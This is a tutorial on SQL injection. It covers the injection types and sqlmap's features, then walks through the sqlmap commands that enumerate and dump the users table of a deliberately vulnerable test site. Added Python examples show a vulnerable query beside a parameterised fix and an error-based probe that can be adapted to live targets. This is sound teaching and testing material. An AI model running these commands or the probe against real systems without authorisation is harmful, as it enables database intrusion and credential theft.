SQL (Structured Query Language) Injection 


👉 SQL Injection


    SQL injection, also known as SQLi, is a common attack vector in which attacker-controlled input is interpreted by the backend database as part of a SQL statement. By manipulating the query, the attacker can read or modify information the application never intended to expose, including sensitive company data, user lists or private customer details. 


    The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business. 


    When calculating the potential cost of an SQLi, it’s important to consider the loss of customer trust should personal information such as phone numbers, addresses, and credit card details be stolen. While this vector can be used to attack any SQL database, websites are the most frequent targets. 



👉 SQL queries

        SQL is a standardized language for accessing and manipulating databases and for building customized views of the data for each user. SQL queries execute commands such as data retrieval, updates and record removal, and different SQL statements implement these tasks; for example, a SELECT statement retrieves rows based on user-provided parameters. A typical e-store's SQL query may look like the following:

SELECT ItemName, ItemDescription
FROM Item
WHERE ItemNumber = <item number supplied by the user>

The web application builds this as a string and sends it to the database as a single SQL statement (classic ASP/VBScript in the original example; VBScript string literals cannot span lines, so the statement is written on one line):

sql_query = "SELECT ItemName, ItemDescription FROM Item WHERE ItemNumber = " & Request.QueryString("ItemID")

Note that the value of the ItemID query-string parameter is concatenated straight into the SQL text. A request such as http://www.estore.com/items/items.asp?itemid=999 therefore generates the following query:

SELECT ItemName, ItemDescription
FROM Item
WHERE ItemNumber = 999

As you can gather from the syntax, this query returns the name and description of item number 999. Because the parameter is spliced into the statement rather than passed to the database as a value, anything else the user puts into itemid (for example 999 OR 1=1) is executed as SQL too; that is the root cause of SQL injection. 
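The following is an added example, not code from the original page: it rebuilds the e-store lookup above in Python on an in-memory SQLite database (SQLite stands in for the e-store's real DBMS, and the Item rows are constructed sample data). The vulnerable function concatenates the query-string value exactly as the ASP snippet does; the safe function passes it as a bound parameter, so the same payload is rejected instead of executed.

```python
import sqlite3

# Constructed sample data standing in for the e-store's Item table.
ITEMS = [
    (998, "Lamp", "Desk lamp"),
    (999, "Mug", "Coffee mug"),
    (1000, "Prototype", "Unreleased item that should never be listed"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database holding the page's Item table."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE Item (ItemNumber INTEGER, ItemName TEXT, ItemDescription TEXT)"
    )
    db.executemany("INSERT INTO Item VALUES (?, ?, ?)", ITEMS)
    return db


def build_query_vulnerable(item_id: str) -> str:
    """Same construction as the page's ASP snippet: the raw query-string value is
    concatenated into the SQL text, so the database parses it as SQL, not data."""
    return "SELECT ItemName, ItemDescription FROM Item WHERE ItemNumber = " + item_id


def lookup_vulnerable(db: sqlite3.Connection, item_id: str) -> list:
    """What the vulnerable page does: execute whatever string was built."""
    return db.execute(build_query_vulnerable(item_id)).fetchall()


def lookup_safe(db: sqlite3.Connection, item_id: str) -> list:
    """Parameterised version: the SQL text is fixed and the value travels
    separately, so user input can only ever be compared as a number."""
    try:
        number = int(item_id)  # the application expects a number: enforce it
    except ValueError:
        return []
    return db.execute(
        "SELECT ItemName, ItemDescription FROM Item WHERE ItemNumber = ?", (number,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "999"))           # only item 999
    print(build_query_vulnerable("999 OR 1=1"))   # the injected statement
    print(lookup_vulnerable(db, "999 OR 1=1"))    # every row, hidden item included
    print(lookup_safe(db, "999 OR 1=1"))          # [] : rejected, never executed
```

With itemid=999 OR 1=1 the vulnerable lookup returns all three rows because the WHERE clause is now true for every row; the parameterised lookup never reaches the database with that input. The same protection holds for string columns: with a bound parameter, a quote in the input is just a character in the value.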


👉 Types of SQL Injections

    SQL injections typically fall into three categories: in-band SQLi (classic), inferential SQLi (blind) and out-of-band SQLi. The categories are defined by the channel the attacker uses to reach the backend data and to get results back, and they differ in speed and damage potential.

 

i.  In-band SQLi: - The attacker uses the same channel of communication to launch their attacks and to gather their results. In-band SQLi’s simplicity and efficiency make it one of the most common types of SQLi attack. There are two sub-variations of this method:

 

◦ Error-based SQLi: - The attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.

 

◦ Union-based SQLi: - This technique takes advantage of the UNION SQL operator, which combines the results of two or more SELECT statements into a single result set. The attacker appends a SELECT of their own (with the same number of columns as the original query) so that its rows are returned in the application's normal HTTP response, where they can be read directly.


ii. Inferential (Blind) SQLi: - The attacker sends data payloads to the server and observes the response and behavior of the server to learn more about its structure. This method is called blind SQLi because the data is not transferred from the website database to the attacker, thus the attacker cannot see information about the attack in-band. 


        Blind SQL injections rely on the response and behavioral patterns of the server so they are typically slower to execute but may be just as harmful. Blind SQL injections can be classified as follows: 


◦ Boolean-based: - The attacker sends a query whose truth value depends on a condition they control. The application's response differs depending on whether that condition is true or false (for example, the page renders normally or shows no results), so the content of the HTTP response changes or stays the same. The attacker thereby learns one true/false answer per request and reconstructs data bit by bit, without any query output ever being shown.


◦ Time-based: - The attacker sends a query that makes the database pause for a number of seconds (for example MySQL's SLEEP() or Microsoft SQL Server's WAITFOR DELAY) only if a condition is true. The HTTP response then arrives either immediately or after the delay, so the response time reveals whether the condition was true or false, again without relying on any data from the database appearing in the response.


iii. Out-of-band SQLi: - The attacker can only carry out this form of attack when certain features are enabled on the database server used by the web application. This form of attack is primarily used as an alternative to the in-band and inferential SQLi techniques. 

        Out-of-band SQLi is used when the attacker cannot use the same channel to launch the attack and gather the results, or when the server is too slow or unstable for inferential techniques to be practical. It relies on the ability of the database server to make DNS or HTTP requests to a host the attacker controls, carrying the extracted data with them.



👉 SQL injection examples

    There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include: 


a) Retrieving hidden data: where you can modify an SQL query to return additional results. 


b) Subverting application logic: where you can change a query to interfere with the application's logic. 


c) UNION attacks: where you can retrieve data from different database tables. 


d) Examining the database: where you can extract information about the version and structure of the database. 


e) Blind SQL injection: where the results of a query you control are not returned in the application's responses. 



👉 sqlmap

        sqlmap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws and the takeover of database servers. It includes a robust detection engine, many specialist features for the penetration tester, and a wide range of switches covering database fingerprinting, data retrieval from the database, access to the underlying file system and command execution on the operating system via out-of-band connections. 

    sqlmap is written in Python, so it runs on any system with a Python interpreter. Its purpose is to find and exploit SQL injection vulnerabilities in web applications. Once it detects one or more injection points on the target, the user can choose from a number of options: an extensive fingerprint of the back-end database management system, retrieval of the DBMS session user and current database, enumeration of users, password hashes, privileges and databases, dumping of entire tables or selected columns, running their own SQL statements, reading particular files from the file system, and more.

        For the full list of options, run: sqlmap --help 



👉 Features of sqlmap

1. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB, among other database management systems. 


2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band. 


3. Automatic recognition of password hash formats and support for cracking them with a dictionary-based attack. 


4. Support for privilege escalation of the database process' user via Metasploit's Meterpreter getsystem command. 


5. By giving DBMS credentials, IP address, port, and a database name, it is possible to connect to the database directly without using SQL injection. 


6. When the database is MySQL, PostgreSQL or Microsoft SQL Server, sqlmap can download and upload any file from and to the database server's underlying file system. 


7. Support for executing arbitrary commands on the database server's underlying operating system and retrieving their standard output, when the database software is MySQL, PostgreSQL or Microsoft SQL Server. 


8. Support for establishing an out-of-band stateful TCP connection between the attacking machine and the operating system underlying the database server. Depending on the user's choice, this channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session. 


9. Support for searching across all databases for specific database names, tables or columns. This is useful for locating tables that hold custom application credentials, whose column names typically contain strings such as name or pass. 


10. Support for dumping whole database tables, a range of entries, or select fields based on the user's preferences. The user can optionally select only a subset of characters from each column's entry to dump. 


11. Users, password hashes, privileges, roles, databases, tables and columns can be enumerated. 


👉 Installing sqlmap

sqlmap comes pre-installed in Kali Linux, the preferred distribution of most penetration testers. If it is missing, install it as follows: 

i. Boot Kali Linux and open a terminal. 

ii. Run: sudo apt-get install sqlmap 


👉 Using sqlmap to test a website for SQL injection 

The form tested here submits its fields in the body of a POST request, so the request is first captured in Burp Suite and the saved request is then handed to sqlmap. 

    The target is the login page of this deliberately vulnerable test site -
http://testphp.vulnweb.com/login.php

This login page sends the username and password as POST parameters. 

👉 Follow the steps below -

i. At first, go to kali linux and open terminal. 


ii. A quick first check is to append a single quote (') to the input: enter admin' as both the username and the password. Before submitting, enable FoxyProxy in the browser so that traffic is routed through Burp (127.0.0.1:8888). 



iii. Open Burp Suite on Kali Linux, go to Proxy and turn Intercept on so that the POST request to http://testphp.vulnweb.com/login.php is captured. Under Options, set the proxy listener to 127.0.0.1:8888. The browser's proxy setting and Burp's listener must be the same address and port. 



iv. Go back to the browser and click Login; the POST request is now held in Burp's Intercept tab.

    Right-click the request and choose Send to Repeater.


v. Open the Repeater tab and click Send. The response contains this SQL error - Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/userinfo.php on line 10. The single quote we appended unbalanced the quoting in the application's query, the query failed, and the PHP code then passed the failed result (false) to mysql_fetch_array(). An error like this shows that our input reaches the database unescaped and is a strong indicator of SQL injection; the sqlmap steps below confirm that it is actually exploitable. 



vi. Save the captured POST request to a text file, sql.txt (right-click the request in Burp and choose Copy to file). Then let sqlmap enumerate the databases: sqlmap -r sql.txt --batch --threads 10 --dbs. With --batch sqlmap takes the default answer to every prompt, and --threads 10 runs up to ten requests in parallel. sqlmap reports the acuart database. 


vii. Next, list the tables in the acuart database: sqlmap -r sql.txt -D acuart --tables 

    Where, -r = the file holding the saved HTTP request 

                -D = the database name 

                --tables = enumerate the tables of the acuart database 



viii. sqlmap finds 8 tables in the acuart database. 



ix. To obtain usernames and passwords we target the users table of the acuart database: sqlmap -r sql.txt -D acuart -T users --columns --dump

        Where, -T = the table name 

                     --columns = enumerate the columns of the users table 

                     --dump = retrieve the table's contents 




x. sqlmap prints the columns of the users table together with their contents, including the username and password, and writes them to a CSV file: Table 'acuart.users' dumped to CSV file. The file location is '/root/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv' 
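The following is an added example, not code from the original page or from sqlmap: it shows in Python what step v did by hand and what the -r option consumes. It parses a raw HTTP request in the format Burp's Copy to file writes (the request below is constructed, with the page's host name and invented field names uname and pass), appends a single quote to each POST parameter in turn, and looks for database error signatures in the response. The send function is pluggable; for an offline run it is a constructed stand-in for the login page, backed by SQLite, that returns the PHP warning text quoted in step v whenever its concatenated query fails.

```python
import re
import sqlite3
from urllib.parse import parse_qsl, urlencode

# Constructed stand-in for sql.txt (field names are assumed, not the site's).
SAVED_REQUEST = """POST /login.php HTTP/1.1
Host: testphp.vulnweb.com
Content-Type: application/x-www-form-urlencoded

uname=admin&pass=admin
"""

# Error strings that real DBMS drivers and PHP extensions emit on broken SQL.
ERROR_SIGNATURES = {
    "MySQL": [r"You have an error in your SQL syntax", r"Warning: mysql_",
              r"mysql_fetch_array\(\)"],
    "Microsoft SQL Server": [r"Unclosed quotation mark after the character string"],
    "PostgreSQL": [r"PostgreSQL query failed", r"Warning: pg_"],
    "Oracle": [r"ORA-\d{5}"],
    "SQLite": [r"unrecognized token", r"SQLite3::query\(\)"],
}


def parse_request(raw: str):
    """Split a raw request into method, path, headers and body parameters."""
    raw = raw.replace("\r\n", "\n")            # Burp saves CRLF line endings
    head, _, body = raw.partition("\n\n")
    request_line, *header_lines = head.splitlines()
    method, path, _version = request_line.split()
    headers = dict(h.split(": ", 1) for h in header_lines if ": " in h)
    return method, path, headers, dict(parse_qsl(body.strip()))


def fingerprint_error(response: str):
    """Return the DBMS whose error signature appears in the response, if any."""
    for dbms, patterns in ERROR_SIGNATURES.items():
        if any(re.search(p, response) for p in patterns):
            return dbms
    return None


def probe(raw_request: str, send) -> dict:
    """Append ' to each body parameter in turn and report the parameters whose
    response carries a database error, mapped to the DBMS it points at."""
    method, path, headers, params = parse_request(raw_request)
    hits = {}
    for name in params:
        tampered = dict(params)
        tampered[name] = params[name] + "'"
        dbms = fingerprint_error(send(method, path, headers, urlencode(tampered)))
        if dbms:
            hits[name] = dbms
    return hits


def fake_vulnerable_site(method, path, headers, body: str) -> str:
    """Constructed offline target: splices both fields into its query and, on a
    SQL error, answers with the PHP warning quoted in step v (imitation only)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uname TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES ('test', 'test')")
    p = dict(parse_qsl(body))
    sql = (f"SELECT * FROM users WHERE uname = '{p.get('uname', '')}' "
           f"AND pass = '{p.get('pass', '')}'")
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return ("Warning: mysql_fetch_array() expects parameter 1 to be resource, "
                "boolean given in /hj/var/www/userinfo.php on line 10")
    return "Welcome" if rows else "Invalid credentials"


if __name__ == "__main__":
    print(probe(SAVED_REQUEST, fake_vulnerable_site))   # both fields flagged
```

To run it against a live target you would replace fake_vulnerable_site with a function that actually sends the request (and recomputes Content-Length). Keep in mind that an error message only shows the input reaches the query unescaped; confirming exploitability is exactly what sqlmap's boolean, UNION and time-based tests in steps vi to x do, and a parameterised query on the server removes the issue entirely.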




